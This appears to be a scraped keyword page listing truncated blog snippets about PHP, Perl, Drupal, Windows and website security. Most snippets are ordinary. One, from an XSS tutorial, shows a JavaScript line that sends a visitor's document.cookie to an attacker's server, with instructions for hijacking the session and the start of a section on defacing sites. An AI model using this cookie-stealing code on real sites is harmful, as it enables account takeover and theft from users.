13 Aug, 2010
Php perl content management system
Articles related to php perl content management system
http://digitalpbk.blogspot.com/2009/05/curl-php-windows-unable-load-libcurlphp.html
cURL
PHP Error on Windows
Fatal error: Call to undefined function curl_init() in D:/webs/
php.php on line 284This problem arises because of not including the lib_curl.dll to
PHP. To solve this uncomment the line as shown below;extension=
php_bz2.dllextension=
php_curl.dll;extension=php_dba.dllNow restart apache server. If you get an error "Unable to Load
X:/path/php/ext/php_curl.dll", copy SSLEAY32.PHPlibEAY32.dll (OpenSSL) Libraries to the
System32 folder.Now restart apache server ...
Published 2 years, 9 months ago
http://digitalpbk.blogspot.com/2007/07/perl-email-forwarder.html
cPanel Mail Forwarder
ForwarderThis handly little program forwardes all emails coming to a certain specified email address and forwards to a forwarding list.Setting up the email capturinge-Mail can be captured using a
PERL script. The
contents of the email must be pipped in. The capturing an passing of the email can be done through cPanel.Click MailClick ForwardersAdd ForwarderIn the text box to the right side, you can provide an email address or a path to your
PERL program that can process ...
Published 4 years, 7 months ago
http://digitalpbk.blogspot.com/2007/03/windows-registry-something-you-must.html
Windows Registry : Something you must know
IntroWhats this all about ? Registry is the place where most windows programs store some data associated with that program. Moreover, registry is used by windows to store much of the configuration information, file associations, start up programs, etc ...The registry is mainly divided into 5 sections HKEY_CLASSES_ROOTHKEY_CURRENT_USER : Current User Preferences.HKEY_LOCAL_MACHINE (HKLM): Global Preferences.HKEY_USERSHKEY_CURRENT_CONFIG : Current
System ...
Published 4 years, 11 months ago
http://digitalpbk.com/2009/12/showing-similar-content-nodes-drupal
Showing similar
content nodes on Drupal
To show similar
content nodes on drupal you have to install the similar module. After installing the similar module
goto admin/build/block Drag the Similar Entries module
OR
If you want to integrate the similar
content to the node body, call the similar_
content theme function. print
theme('similar_content', $node); on node.tpl.
php
Using the variables available withing node.tpl.
php you can choose whether to display the similar
content ...
Published 2 years, 2 months ago
http://digitalpbk.com/perl/perl-script-remove-directory-and-contents-recursively
Perl script to remove a directory and
contents recursively
This is the script for sandeep when he asked me how to delete a directory in
perl. rmdir function only removes empty directories. So we need to remove the
contents of the directory before removing the directory. So if the directory contains more directories / folders we would have to recursively delete all the directories under the directory. Well so here is the code just to do that.
#!/usr/bin/
perl
deldir("test"); ...
Published 2 years, 2 months ago
http://digitalpbk.com/perl/script-fetch-pnr-status-reservation-train-indian-railways
Perl Script to Fetch PNR Status reservation on train from Indian Railways
The code below is a
perl script that fetches the PNR status from the indianrail.gov.in website and displays it on the command line.
Warning: No one is authorised to make any type of commercial usage like putting web advertisements or SMS service and Reproducing/Transmitting/Storing in its database, any
content of www.indianrail.gov.in website, without prior written permission from Indian Railways. Violators ...
Published 2 years ago
http://digitalpbk.blogspot.com/2007/05/my-first-useful-perl-program.html
My First useful
PERL program
#!/usr/bin/
perl -w$username = $ARGV[0];$username = "s28arunpbk" if(!$username); ## Get the username from the first command line argument# If null assign my user id.#use LWP;use LWP::UserAgent;## Initialize objects#$ua = LWP::UserAgent->new;$ua->agent("Checkmap/1.0");my $req=HTTP::Request->new(GET => "http://sitemeter.com/?a=stats&s;=$username&r;=0");my $res = $ua->request($req);## Send a request and grab ...
Published 4 years, 9 months ago
http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html
();i.src =
"http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).Defacing a websiteTo deface a website , the site must have a
system which puts something you submit on their site (like ...
Published 5 years, 1 month ago
http://digitalpbk.com/perl/install-modules-unrecognized-command-line-option-fstack-protector
.609.tar.gz
/usr/bin/make -- NOT OK
Running make test
Can't test without successful make
Running make install
Make had returned bad status, install seems impossible
This error is due to older version of GCC in your
system. The stack protector was introduced as of GCC 4. Look the version in your
system by running gcc -v.
Update your
system if you are using cygwin run setup.exe and from the package list check GCC4, as shown below.
(Search for GCC)
Now try reinstalling the
PERL module ...
Published 1 year, 10 months ago
http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html
FTPCHK3 : Virus that adds malicious scripts to your website.
IntroThis virus changes all your web files,
php, html javascript and tpl files in prominent CMS
systems to add a malicious script into your site. This injection allows the attacker to remotely execute
PHP code on your website if the
php infected code is running on your pages. Its supposedly called Bagle. But who cares about the name? It's nasty and start fixing.How it got in ?This can be due to potential security holes in your FTP ...
Published 2 years, 3 months ago
Related help topics for php perl content management system
More keywords like php perl content management system
More pages for php perl content management system